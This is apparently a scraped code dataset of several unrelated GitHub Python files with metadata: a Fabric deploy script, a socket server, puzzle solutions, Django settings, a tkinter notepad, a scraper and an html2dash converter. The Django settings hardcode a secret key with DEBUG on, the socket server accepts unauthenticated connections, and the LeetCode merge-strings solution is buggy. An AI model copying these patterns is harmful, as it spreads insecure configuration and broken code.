correctly, otherwise returns False\n \"\"\"\n if not path.exists(archive_path):\n return False\n\n filename = path.basename(archive_path)\n releases = \"/data/web_static/releases\"\n uncompfile = path.splitext(filename)[0]\n\n try:\n put(archive_path, '/tmp/')\n\n run('mkdir -p {}/{}'.format(releases, uncompfile))\n run('tar -xzf /tmp/{} -C {}/{}/'.format(filename, releases,\n uncompfile))\n\n run('rm /tmp/{}'.format(filename))\n\n run('rsync -a {}/{}/web_static/ {}/{}'.format(\n releases, uncompfile, releases, uncompfile))\n run('rm -rf {}/{}/web_static/'.format(releases, uncompfile))\n\n run('rm -rf /data/web_static/current')\n run('ln -s {}/{} /data/web_static/current'.format(releases,\n uncompfile))\n\n return True\n except Exception:\n return False\n\n\ndef deploy():\n \"\"\"creates and distributes an archive to web servers\"\"\"\n pathname = do_pack()\n if not pathname:\n return False\n return do_deploy(pathname)\n","repo_name":"Mcnores-Samuel/AirBnB_clone_v2","sub_path":"3-deploy_web_static.py","file_name":"3-deploy_web_static.py","file_ext":"py","file_size_in_byte":3022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"18048435162","text":"import socket\nimport select\nimport json\nfrom jsonparser import JsonParserClass\nimport time\n\nclass JSONSocketServer:\n global sock\n \"\"\" Simple socket server that listens to one single client. \"\"\"\n\n def __init__(self,host='0.0.0.0', port=2010):\n global sock\n \"\"\" Initialize the server with a host and port to listen to. \"\"\"\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n self.host = host\n self.port = port\n sock.bind((host, port))\n sock.listen(1)\n self._running = True\n self.json_parser_tool = JsonParserClass()\n\n def terminate(self):\n self._running = False\n\n def run(self):\n global haveSocketOpened\n while self._running:\n self.run_server()\n haveSocketOpened = False\n time.sleep(5)\n self.close()\n time.sleep(5)\n self.__init__()\n print('Exiting Socket Server')\n\n def close(self):\n global sock\n \"\"\" Close the server socket. \"\"\"\n print('Closing server socket (host {}, port {})'.format(self.host, self.port))\n if sock:\n sock.close()\n sock = None\n\n def sendSocketMessage(self, message):\n global sock\n global haveSocketOpened\n global client_sock\n # print('Send Socket message : ')\n try:\n if haveSocketOpened:\n client_sock.send(message.encode())\n except:\n writeLogFileError(\"Socket server - error while sending messages\")\n print(\"Error sending Socket message\")\n\n def run_server(self):\n global sock\n global client_sock\n global haveSocketOpened\n \"\"\" Accept and handle an incoming connection. \"\"\"\n print('Starting socket server (host {}, port {})'.format(self.host, self.port))\n client_sock, client_addr = sock.accept()\n print('Client {} connected'.format(client_addr))\n haveSocketOpened = True\n stop = False\n while not stop and self._running:\n if client_sock:\n # Check if the client is still connected and if data is available:\n try:\n rdy_read, rdy_write, sock_err = select.select([client_sock, ], [], [])\n except select.error:\n print('Select() failed on socket with {}'.format(client_addr))\n writeLogFileError(\"Socket server - Select() failed on socket with {}\")\n return 1\n if len(rdy_read) > 0:\n try:\n #finalMessageContent = \"\"\n #read_data = client_sock.recv(255)\n #while read_data[len(read_data)-1] != '_':\n #for x in range(0, 10):\n # finalMessageContent += str(read_data)\n # read_data = client_sock.recv(255)\n # print(\"Get one package of message:\" + str(finalMessageContent))\n\n read_data = client_sock.recv(4000)\n finalMessageContent = read_data\n\n # Check if socket has been closed\n if len(finalMessageContent) == 0:\n print('{} closed the socket.'.format(client_addr))\n stop = True\n haveSocketOpened = False\n else:\n #print('>>> Received: {}'.format(finalMessageContent.rstrip()))\n if finalMessageContent.rstrip() == 'quit':\n stop = True\n haveSocketOpened = False\n else:\n ### client_sock.send(read_data) ### Test with loop back\n #print(\"Parse this : \" + str(finalMessageContent[2:].decode(\"utf-8\")))\n try:\n json_content = json.loads(str(finalMessageContent[2:].decode(\"utf-8\")))\n print(\"Json - message type: \" + str(json_content[\"type\"]))\n if(str(json_content[\"type\"]) == \"MOVEMENTCONTROL\"):\n self.json_parser_tool.parse_movement_control_message(json_content)\n print(\"Send back OK message to the socket server\")\n #self.sendSocketMessage(\"Moveing control message - OK\\r\\n\")\n self.sendSocketMessage(\"{\\\"optional\\\": \\\"NaN\\\", \\\"state\\\": \\\"OK\\\", \\\"type\\\": \\\"MOVEMENTCONTROL\\\"}\\r\\n\")\n else:\n if(str(json_content[\"type\"]) == \"STATECONTROL\"):\n self.json_parser_tool.parse_state_control_message(json_content)\n #self.sendSocketMessage(\"State control message - OK\\r\\n\")\n self.sendSocketMessage(\"{\\\"optional\\\": \\\"NaN\\\", \\\"state\\\": \\\"OK\\\", \\\"type\\\": \\\"STATECONTROL\\\"}\\r\\n\")\n else:\n if (str(json_content[\"type\"]) == \"STEPLIST\"):\n self.json_parser_tool.parse_steps_message(json_content)\n # self.sendSocketMessage(\"State control message - OK\\r\\n\")\n self.sendSocketMessage(\n \"{\\\"optional\\\": \\\"NaN\\\", \\\"state\\\": \\\"OK\\\", \\\"type\\\": \\\"STEPLIST\\\"}\\r\\n\")\n else:\n if (str(json_content[\"type\"]) == \"PARAMS\"):\n self.json_parser_tool.parse_params_message(json_content)\n # self.sendSocketMessage(\"State control message - OK\\r\\n\")\n self.sendSocketMessage(\n \"{\\\"optional\\\": \\\"NaN\\\", \\\"state\\\": \\\"OK\\\", \\\"type\\\": \\\"PARAMS\\\"}\\r\\n\")\n except Exception as f:\n print(\n 'Issue during json parsing (' + str(\n f) + \") !\")\n\n except Exception as e:\n print('Client has disconnected while reading from the socket, go back to listening (' + str(e)+ \") !\")\n stop = True\n haveSocketOpened = False\n else:\n print(\"No client is connected, SocketServer can't receive data\")\n stop = True\n haveSocketOpened = False\n # Close socket\n print('Closing connection with {}'.format(client_addr))\n client_sock.close()\n haveSocketOpened = True\n return 0","repo_name":"tothandrasbme/dummyprojectcode","sub_path":"jsonsocketservice.py","file_name":"jsonsocketservice.py","file_ext":"py","file_size_in_byte":7181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"20590676059","text":"# Input: word1 = \"abc\", word2 = \"pqr\"\n# Output: \"apbqcr\"\n# Explanation: The merged string will be merged as so:\n# word1: a b c\n# word2: p q r\n# merged: a p b q c r\n\nclass Solution:\n def mergeAlternately(self, word1: str, word2: str) -> str:\n res = ''\n for i in range(max(word1, word2)):\n if i < len(word1):\n res.append(word1[i])\n if i < len(word2):\n res.append(word2[i])\n\n return res\n","repo_name":"sujijava/leet_coding_w_python","sub_path":"archives/Top Interview 75/1768. Merge Strings Alternately.py","file_name":"1768. Merge Strings Alternately.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"17250279877","text":"n,x = list(map(int,input().split()))\r\nlist1 = []\r\nfor i in range(n):\r\n y = int(input(\"enter price of flower\"))\r\n list1.append(y)\r\nprint(\"number of flowers are \" + str(n) + \" and their prices are \", list1)\r\nBuyer = x\r\nprint(\"Number of buyers are :\", Buyer)\r\nres = sorted(list1, reverse=True)\r\nprint(res)\r\ndef TotalPrice(res):\r\n count = 0\r\n price = 0\r\n k = 1\r\n for i in res:\r\n count += 1\r\n price = price + k*i\r\n if count == Buyer:\r\n k += 1\r\n return price\r\nprint(TotalPrice(res))\r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Aakaaaassh/Coding","sub_path":"Greedy_florist.py","file_name":"Greedy_florist.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"72590190873","text":"\"\"\"\nDjango settings for asm project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.7/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.7/ref/settings/\n\"\"\"\n\ndef get_env_variable(var_name):\n \"\"\" Get the environment variable or return exception \"\"\"\n try:\n return os.environ[var_name]\n except KeyError:\n error_msg = 'Set the %s environment variable' % var_name\n raise ImproperlyConfigured(error_msg)\n\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\nBASE_DIR = os.path.dirname(os.path.dirname(__file__))\n\nBASE_URL = '/'\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = 'st42b$-xzcuoi2%&fs%^v%nzkmjo!h6zgd1g6c5(42)+3gj^2z'\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nTEMPLATE_DEBUG = True\n\nALLOWED_HOSTS = [\n 'localhost',\n '52.1.4.157',\n '.52.1.4.157',\n '.52.1.4.157.',\n]\n\nADMINS = (\n ('Samuel Magondu', 'MagonduNjenga@gmail.com'), \n)\n\nMANAGERS = ADMINS\n\n# Application definition\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.admindocs',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django.contrib.sites',\n 'django.contrib.sitemaps',\n 'siteAdmin',\n 'photo',\n 'wagtail',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\nROOT_URLCONF = 'toolbox.urls'\n\nWSGI_APPLICATION = 'toolbox.wsgi.application'\n\nSITE_ID = 1\n\n# Database\n# https://docs.djangoproject.com/en/1.7/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n #Set this as env variables to avoid hardcoding\n 'ENGINE': 'django.db.backends.mysql', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'. \n 'NAME': get_env_variable('DB_NAME'),\n 'USER': get_env_variable('DB_USER'),\n 'PASSWORD': get_env_variable('DB_PASSWORD'),\n 'HOST': get_env_variable('DB_HOST'),\n 'PORT': get_env_variable('DB_PORT')\n }\n}\n\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.7/topics/i18n/\n\nLANGUAGE_CODE = 'en-uk'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.7/howto/static-files/\nSTATIC_ROOT = os.path.join(BASE_DIR, 'static')\nSTATIC_URL = '/static/'\n\nMEDIA_ROOT = os.path.join(BASE_DIR, 'media')\nMEDIA_URL = 'media/'\n\nLOGIN_URL = BASE_URL + 'accounts/login'\nLOGIN_REDIRECT_URL = BASE_URL\n\nTEMPLATE_DIRS = (\n os.path.join(BASE_DIR, 'html'),\n '/opt/projects/engine/lib/python2.7/site-packages/django/contrib/admin/templates/admin',\n # Put strings here, like \"/home/html/django_templates\" or \"C:/www/django/templates\". \n # Always use forward slashes, even on Windows. \n # Don't forget to use absolute paths, not relative paths. \n)\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'filters': {\n 'require_debug_false': {\n '()': 'django.utils.log.RequireDebugFalse'\n }\n },\n 'handlers': {\n 'mail_admins': {\n 'level': 'ERROR',\n 'filters': ['require_debug_false'],\n 'class': 'django.utils.log.AdminEmailHandler'\n }\n },\n 'loggers': {\n 'django.request': {\n 'handlers': ['mail_admins'],\n 'level': 'ERROR',\n 'propagate': True,\n },\n }\n}\n\n\n","repo_name":"itsMagondu/ASM","sub_path":"toolbox/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":4244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"71515300632","text":"import os\nimport glob\n\n\nimg_root = 'datasets/ICPR/ICPR_train/image'\ntxt_root = 'datasets/ICPR/ICPR_train/txt'\n\nimgs = glob.glob(os.path.join(img_root, '*.jpg'))\n\n\na = []\nfor im in imgs:\n f = os.path.splitext(os.path.basename(im))[0] + '.txt'\n t = os.path.join(txt_root, f)\n if os.path.exists(t):\n one = '{} {}\\n'.format(im, t)\n a.append(one)\n\nwith open('datasets/icpr_train.txt', 'w') as f:\n f.writelines(a)\n\nprint('done.')","repo_name":"gentlebreeze1/dbnet-tensorrt","sub_path":"datasets/gen_icpr_train.py","file_name":"gen_icpr_train.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"6819759059","text":"from tkinter import *\nfrom tkinter import filedialog as fd\n\n\ndef extract_text():\n file_name = fd.asksaveasfilename(\n filetypes=((\"TXT files\", \"*.txt\"),\n (\"HTML files\", \"*.html;*.htm\"),\n (\"All files\", \"*.*\")))\n f = open(file_name, 'w')\n s = text.get(1.0, END)\n f.write(s)\n f.close()\n\ndef insert_text():\n file_name = fd.askopenfilename()\n f = open(file_name)\n s = f.read()\n text.insert(1.0, s)\n f.close()\n\ndef child_window():\n win = Toplevel(root)\n x_entry = Entry(win)\n x_entry.pack()\n y_entry = Entry(win)\n y_entry.pack()\n\n\n def set_child_window():\n new_x = x_entry.get()\n new_y = y_entry.get()\n root.geometry(new_x + 'x' + new_y)\n\n Button(win, text = 'Ok', command = set_child_window).pack()\n\nroot = Tk()\nmainmenu = Menu(root)\nroot.config(menu = mainmenu)\nroot.title('блокнот')\n\nfilemenu = Menu(mainmenu, tearoff = 0)\nfilemenu.add_command(label = 'Сохранить', command = extract_text)\nfilemenu.add_command(label = 'Открыть', command = insert_text)\n\n\ntext = Text()\ntext.pack()\n\nmainmenu.add_cascade(label = 'Файл', menu = filemenu)\nmainmenu.add_command(label = 'Настройки', command = child_window)\n\n\nroot.mainloop()","repo_name":"clock76/knuiuiuhiuh","sub_path":"note.py","file_name":"note.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"25107403944","text":"import multiprocessing\nfrom multiprocessing import Pool\nfrom margaritashotgun import remote_host\nfrom margaritashotgun import logger\nimport logging\n\n\nclass Workers():\n \"\"\"\n \"\"\"\n cpu_count = None\n worker_count = None\n progress_bar = True\n hosts = None\n\n def __init__(self, conf, workers, name, library=True):\n \"\"\"\n \"\"\"\n self.name = name\n self.library = library\n self.progressbar = True\n self.cpu_count = multiprocessing.cpu_count()\n host_count = len(conf)\n self.worker_count = self.count(workers, self.cpu_count, host_count)\n self.queue = multiprocessing.Queue(-1)\n\n try:\n log_dir = conf[0]['logging']['dir']\n if log_dir[-1:] != '/':\n log_dir = log_dir + '/'\n except TypeError:\n log_dir = \"\"\n try:\n log_prefix = conf[0]['logging']['prefix'] + \"-\"\n except TypeError:\n log_prefix = \"\"\n\n self.log_file = \"{}{}memory-capture.log\".format(\n log_dir, log_prefix)\n\n if self.worker_count > 1 or self.library is True:\n self.progressbar = False\n self.conf = []\n for c in conf:\n c['host']['progressbar'] = self.progressbar\n self.conf.append(c)\n\n def count(self, workers, cpu_count, host_count):\n \"\"\"\n \"\"\"\n if workers == 'auto':\n if cpu_count > host_count:\n worker_count = host_count\n else:\n worker_count = cpu_count\n elif workers > host_count:\n worker_count = host_count\n else:\n worker_count = int(workers)\n return worker_count\n\n def spawn(self, desc, timeout=1800):\n \"\"\"\n \"\"\"\n self.pool = Pool(self.worker_count, initializer=remote_host._init,\n initargs=(self.queue,))\n\n self.listener = logger.Logger(target=logger.listener,\n args=(self.queue,\n self.name,\n self.log_file,\n desc))\n self.listener.start()\n res = self.pool.map_async(remote_host.process, self.conf)\n results = res.get(timeout)\n\n self.cleanup()\n return results\n\n def cleanup(self, terminate=False):\n if terminate:\n self.pool.terminate()\n else:\n self.pool.close()\n self.pool.join()\n self.queue.put_nowait(None)\n self.queue.close()\n self.listener.join()\n","repo_name":"ThreatResponse/margaritashotgun","sub_path":"margaritashotgun/workers.py","file_name":"workers.py","file_ext":"py","file_size_in_byte":2613,"program_lang":"python","lang":"en","doc_type":"code","stars":231,"dataset":"github-code","pt":"5"} +{"seq_id":"71029499032","text":"import requests\r\nimport pandas as pd\r\nfrom bs4 import BeautifulSoup\r\nimport openpyxl # import to excel\r\nfrom tabulate import tabulate # format\r\n\r\nurl = \"https://rozgrywki.pzkosz.pl/liga/4/statystyki.html\"\r\nr = requests.get(url)\r\n\r\nsoup = BeautifulSoup(r.text, \"html.parser\")\r\nif \"Łapiński\" in r.text:\r\n print(\"JEEEEST\")\r\n\r\ntable = soup.find(\"table\", class_=\"stattype splitTable\").find(\r\n 'tbody').find_all('tr')\r\n\r\n#print(table)\r\ntable_data = []\r\n\r\nfor row in table:\r\n dic = {}\r\n\r\n row_data = row.find_all('td')\r\n dic['place'] = row_data[0].text\r\n dic['player'] = row_data[1].text\r\n dic['team'] = row_data[2].text\r\n dic['matches'] = row_data[3].text\r\n dic['points_sum'] = row_data[4].text\r\n dic['points_avg'] = row_data[5].text\r\n\r\n table_data.append(dic)\r\n\r\n#print(table_data)\r\n# for key, value in dic.items():\r\n# table.append([key, value])\r\n\r\nheaders = table_data[0].keys()\r\nprint(tabulate(table_data, headers=\"keys\"))\r\n\r\n\r\n# , tablefmt=\"grid\"\r\n\r\ndf = pd.DataFrame(table_data)\r\ndf.to_excel('teams_data.xlsx', index=False)\r\ndf.to_csv('teams_data.csv', index=False)\r\n","repo_name":"zosialaa/pzkosz","sub_path":"ApiPzkosz.py/statictics.py","file_name":"statictics.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"31828643331","text":"import sys\nimport uuid\nimport xml.etree.ElementTree as xml\nimport os\nimport re\nfrom datetime import datetime\n\nfrom lastitemiterator import lii\nfrom pathlib import Path\nfrom stringbuilder import StringBuilder\nimport hashlib\nimport json\n\nVERSION = '0.3.5'\nBUF_SIZE = 65536\nATTRIBUTE_TRANSLATIONS = {'class': 'className'}\nTYPE_CONVERSIONS = {'str': str, 'int': int, 'float': float, 'bool': bool}\nCONFIG_TYPE_GETTER = {'str': 'get', 'int': 'getint', 'float': 'getfloat', 'bool': 'getboolean'}\nLIB_CALLS = {'date': 'date', 'time': 'time', 'timedelta': 'timedelta', 'datetime': 'datetime', 'pd': 'pd', 'px': 'px',\n 'req': 'req', 'json': 'jp', 'format': 'fmt', 'io': 'io'}\n\n\nclass Html2Dash:\n\n def __init__(self, config, directory, use_pages):\n self.config = config\n self.directory = directory\n self.use_pages = use_pages\n page_file_path = Path(directory, \"pages.json\")\n if os.path.exists(page_file_path):\n with open(page_file_path, \"r\") as f:\n self.pages = json.load(f)\n else:\n self.pages = {}\n\n def save_page_file(self):\n with open(Path(self.directory, \"pages.json\"), \"w\") as f:\n json.dump(self.pages, f)\n\n def hash(self, file_stream):\n sha256 = hashlib.sha256()\n while True:\n data = file_stream.read(BUF_SIZE)\n if not data:\n break\n sha256.update(data)\n\n file_stream.seek(0)\n return sha256.hexdigest()\n\n def convert(self, path, page_name=None):\n with open(path, \"rb\") as html:\n html_hash = self.hash(html)\n name = Path(path).stem.replace(\" \", \"_\")\n out_name = f\"./{self.directory}/html2dash_generated_{name}.py\"\n tree = xml.parse(html)\n root = tree.getroot()\n includes = self.find_includes(root, Path(path).parent)\n page_obj = self.pages.get(name, None)\n if page_obj is not None and page_obj[\"hash\"] == html_hash and\\\n all([include[1][\"hash\"] == page_obj[\"includes\"].get(include[0], None) for include in includes.items()]) and\\\n page_obj[\"html2dash_version\"] == VERSION and\\\n os.path.exists(out_name):\n return\n elif page_obj is None:\n page_obj = {}\n self.pages[name] = page_obj\n\n page_obj[\"hash\"] = html_hash\n page_obj[\"generated\"] = datetime.utcnow().isoformat()\n page_obj[\"includes\"] = {str(include): includes[include][\"hash\"] for include in includes}\n page_obj[\"html2dash_version\"] = VERSION\n old_file = page_obj.get(\"generated_file\", None)\n if old_file is not None and os.path.exists(out_name):\n os.remove(old_file)\n\n self.handle_includes(root, includes, Path(path).parent)\n self.reformat_ids(root, name)\n layout_builder = StringBuilder()\n self.generate_layout_code(root, layout_builder)\n transform_builder = StringBuilder()\n self.generate_transforms(root, transform_builder)\n update_builder = StringBuilder()\n self.generate_update_code_new(root, update_builder, self.use_pages)\n with open(f\"./templates/{'paged_' if self.use_pages else ''}template.pyt\", \"r\") as template:\n template = template.read().format(\n page=(page_name or \"/\" + re.sub(r'(? 0:\n builder.append(\", \")\n\n self.generate_parameter_list(node, builder, suppress_linebreak=True)\n builder.append(\"]\")\n\n def generate_transform(self, node, builder):\n name = node.get(\"method_name\")\n data = node.find(\"{pd}transform.data\")\n if data is None:\n return None\n\n builder.append(f\"{name}(\")\n self.generate_function_call(data[0], builder)\n builder.append(\")\")\n\n def generate_lib_call(self, node, builder, lib_prefix=None):\n match = re.match(\"^(?:{(.*)})?(.*)$\", node.tag)\n namespace = match.group(1)\n tag = match.group(2)\n suppress_new = node.get(\"__suppress_new__\")\n if suppress_new is None:\n suppress_new = \"False\"\n\n if tag == 'new' and suppress_new == \"False\":\n tag = None\n\n if lib_prefix is None:\n if namespace in LIB_CALLS:\n lib_prefix = LIB_CALLS[namespace]\n else:\n return\n\n name = node.get(\"name\")\n if name is not None:\n builder.append(f\"{name}=\")\n\n builder.append(f\"{lib_prefix}{'.' if tag is not None else ''}{tag or ''}(\")\n attrib_childs = filter(lambda x: x.tag.startswith(f\"{node.tag}.\"), node)\n childs = filter(lambda x: not x.tag.startswith(f\"{node.tag}.\"), node)\n\n self.generate_parameter_list(childs, builder, len(node.attrib) > 0)\n for last, attrib_child in lii(attrib_childs):\n attrib_name = attrib_child.tag.replace(f\"{node.tag}.\", \"\")\n builder.append(f\"{attrib_name}=\")\n self.generate_function_call(attrib_child[0], builder)\n if not last or len(node.attrib) > 0:\n builder.append(\", \")\n\n for last, attr in lii(node.attrib):\n if attr == \"name\" or attr == \"__suppress_new__\":\n continue\n builder.append(f\"{attr}={self.format_value(node.attrib[attr])}\")\n if not last:\n builder.append(\", \")\n builder.append(\")\")\n\n def generate_dict(self, node, builder):\n param_name = node.get(\"name\")\n if param_name is not None:\n builder.append(f\"{param_name}=\")\n\n builder.append(\"dict(\")\n for last, child in lii(node):\n if len(child) > 0:\n builder.append(f\"{child.tag}={self.generate_function_call(child, builder)}, \")\n else:\n builder.append(f\"{child.tag}={self.format_value(child.text)}\")\n if not last or len(node.attrib) > (0 if param_name is None else 1):\n builder.append(\", \")\n\n for last, attrib in lii(node.attrib):\n if attrib == \"name\":\n continue\n\n builder.append(f\"{attrib}={self.format_value(node.attrib[attrib])}\")\n if not last:\n builder.append(\", \")\n\n builder.append(\")\")\n\n def generate_method(self, method, builder, from_model=True):\n method_name = method.get(\"method_name\")\n param_name = method.get(\"name\")\n if param_name is not None:\n builder.append(f\"{param_name}=\")\n\n builder.append(f\"{'model.' if from_model else ''}{method_name}(\")\n self.generate_parameter_list(method, builder)\n builder.append(\")\")\n\n def is_lib_call(self, node):\n match = re.match(\"^(?:{(.*)})?(.*)$\", node.tag)\n namespace = match.group(1)\n tag = match.group(2)\n return namespace in LIB_CALLS or namespace == \"df\"\n\n def generate_parameter_list(self, parameters, builder, trailing_comma=False, suppress_linebreak=False):\n for last, parameter in lii(parameters):\n self.generate_function_call(parameter, builder, suppress_linebreak)\n if not last or trailing_comma:\n if self.config.getboolean(\"dash2html\", \"ProduceDebuggableCode\") and self.is_lib_call(\n parameter) and not suppress_linebreak:\n builder.append_line(\", \")\n else:\n builder.append(\", \")\n\n def generate_parameter(self, parameter, builder):\n value = self.format_value(parameter.get(\"value\") or parameter.text) or parameter.get('input') or parameter.get(\n 'state')\n name = parameter.get(\"name\")\n if name is not None:\n builder.append(f\"{name}=\")\n builder.append(value)\n\n def generate_config(self, node, builder):\n key = node.get(\"key\")\n type = node.get(\"type\") or 'str'\n default = TYPE_CONVERSIONS[type](node.get(\"default\"))\n key = \", \".join(key.split(\".\"))\n builder.append(f\"config.{CONFIG_TYPE_GETTER[type]}('{key}'\")\n if default is not None:\n builder.append(f\", fallback={default}\")\n\n builder.append(\")\")\n\n def generate_update_code_new(self, node, builder, use_pages):\n parent_map = {c: p for p in node.iter() for c in p}\n node_map = {n.get(\"id\"): n for n in node.iter() if n.get(\"id\") is not None}\n outputs = node.findall(\".//dash:output\", namespaces={\"dash\": \"dash\"})\n input_map = {n.get('id'): n for n in node.findall(\".//dash:input\", namespaces={\"dash\": \"dash\"})}\n output_groups = {}\n for output in outputs:\n parent = parent_map[output].get(\"id\")\n if parent not in output_groups:\n output_groups[parent] = []\n\n output_groups[parent].append(output)\n\n if len(outputs) == 0 and len(input_map) == 0:\n return;\n\n for last_output, parent_id, outputs_in_parent in lii(output_groups.items()):\n input_candidates = node_map[parent_id].findall(\".//d2h:parameter[@input]\", namespaces={\"d2h\": \"d2h\"})\n inputs = []\n input_ids = []\n for input in input_candidates:\n input_node = input_map[input.get(\"input\")]\n input_component = input_node.get(\"component_property\")\n input_parent_id = parent_map[input_node].get(\"id\")\n id = f\"{input_component}:{input_parent_id}\"\n if id not in input_ids:\n inputs.append(input)\n input_ids.append(id)\n\n state_candidates = node_map[parent_id].findall(\".//d2h:parameter[@state]\", namespaces={\"d2h\": \"d2h\"})\n states = []\n state_ids = []\n for input in state_candidates:\n input_node = input_map[input.get(\"state\")]\n input_component = input_node.get(\"component_property\")\n input_parent_id = parent_map[input_node].get(\"id\")\n id = f\"{input_component}:{input_parent_id}\"\n if id not in input_ids and id not in state_ids:\n states.append(input)\n state_ids.append(id)\n\n builder.append_line(f\"@{'' if use_pages else 'app.'}callback(\")\n builder.push_indent()\n for last, output in lii(outputs_in_parent):\n builder.append(\n f'Output(component_id=\"{parent_id}\", component_property=\"{output.get(\"component_property\")}\")')\n if not last or len(inputs) > 0:\n builder.append_line(\",\")\n\n for last, input in lii(inputs):\n input_node = input_map[input.get(\"input\")]\n input_parent_id = parent_map[input_node].get(\"id\")\n builder.append(\n f'Input(component_id=\"{input_parent_id}\", component_property=\"{input_node.get(\"component_property\")}\")')\n if not last or len(states) > 0:\n builder.append_line(\",\")\n\n for last, input in lii(states):\n input_node = input_map[input.get(\"state\")]\n input_parent_id = parent_map[input_node].get(\"id\")\n builder.append(\n f'State(component_id=\"{input_parent_id}\", component_property=\"{input_node.get(\"component_property\")}\")')\n if not last:\n builder.append_line(\",\")\n\n builder.append_line(\")\")\n builder.pop_indent()\n builder.append(f\"def update_{parent_id}(\")\n for last, input in lii(inputs):\n input_node = input_map[input.get(\"input\")]\n builder.append(input_node.get(\"id\"))\n if not last or len(states) > 0:\n builder.append(\", \")\n\n for last, states in lii(states):\n input_node = input_map[states.get(\"state\")]\n builder.append(input_node.get(\"id\"))\n if not last:\n builder.append(\", \")\n\n builder.append_line(\"):\")\n builder.push_indent()\n\n for output in outputs_in_parent:\n value = output.get(\"value\")\n property = output.get(\"component_property\")\n builder.append(f\"__output_{parent_id}_{property} = \")\n\n if value is not None:\n builder.append(self.format_value(value))\n elif len(output) > 0:\n self.generate_function_call(output[0], builder, True)\n else:\n builder.append(\"None\")\n\n builder.append_line()\n\n builder.append(\"return \")\n for last, output in lii(outputs_in_parent):\n property = output.get(\"component_property\")\n builder.append(f\"__output_{parent_id}_{property}\")\n if not last:\n builder.append(\", \")\n\n builder.pop_indent()\n\n if not last_output:\n builder.append_line(builder.line_break)\n\n def generate_layout_code(self, node, builder):\n match = re.match(\"^(?:{(.*)})?(.*)$\", node.tag)\n tag = match.group(2)\n namespace = match.group(1) or \"html\"\n if namespace == \"html\":\n tag = tag.capitalize()\n\n builder.append(f\"{namespace}.{tag}(\")\n children = [x for x in node if not (\n x.tag.startswith(f\"{tag}.\") or x.tag.startswith(f\"{node.tag}.\") or x.tag.startswith(\n \"{d2h}\") or x.tag.startswith(\"{dash}\"))]\n nested_attributes = [x for x in node if x.tag.startswith(f\"{tag}.\") or x.tag.startswith(f\"{node.tag}.\")]\n has_args = False\n if len(children) > 0:\n builder.append_line(\"[\")\n builder.push_indent()\n for last, child in lii(children):\n self.generate_layout_code(child, builder)\n if not last:\n builder.append_line(\",\")\n builder.append_line()\n builder.pop_indent()\n builder.append(\"]\")\n has_args = True\n elif len(node) == 0:\n if node.text is not None and node.text != \"\":\n if '\\n' in node.text or '\\r' in node.text:\n builder.append_line(f'\"\"\"{node.text}\"\"\"')\n else:\n builder.append(f'\"{node.text}\"')\n has_args = True\n\n builder.push_indent()\n if len(node.attrib) > 0 and has_args:\n builder.append_line(\",\")\n\n for last_attrib, key, value in lii(node.attrib.items()):\n if key in ATTRIBUTE_TRANSLATIONS:\n key = ATTRIBUTE_TRANSLATIONS[key]\n\n if key == \"style\":\n builder.append(\"style={\")\n for last_item, item in lii(value.split(\";\")):\n key, value = item.split(\":\")\n builder.append(f'\"{key.strip()}\": \"{value.strip()}\"{\"\" if last_item else \",\"}')\n builder.append(f\"}}{'' if last_attrib else ','}\")\n else:\n builder.append(f\"{key}={self.format_value(value)}\")\n\n if not last_attrib:\n builder.append_line(\", \")\n\n if len(nested_attributes) > 0 and (has_args or len(node.attrib) > 0):\n builder.append_line(\",\")\n\n for last, child in lii(nested_attributes):\n complex = bool(child.get(\"complex\") or False)\n ctag = child.tag.split(\".\")[-1]\n if complex:\n builder.append(f\"{ctag}=\")\n self.generate_function_call(child[0], builder, False)\n else:\n builder.append(f\"{ctag}={{\")\n for last_item, item in lii(child):\n builder.append(f'\"{item.tag}\": {self.format_value(item.text.strip())}{\"\" if last_item else 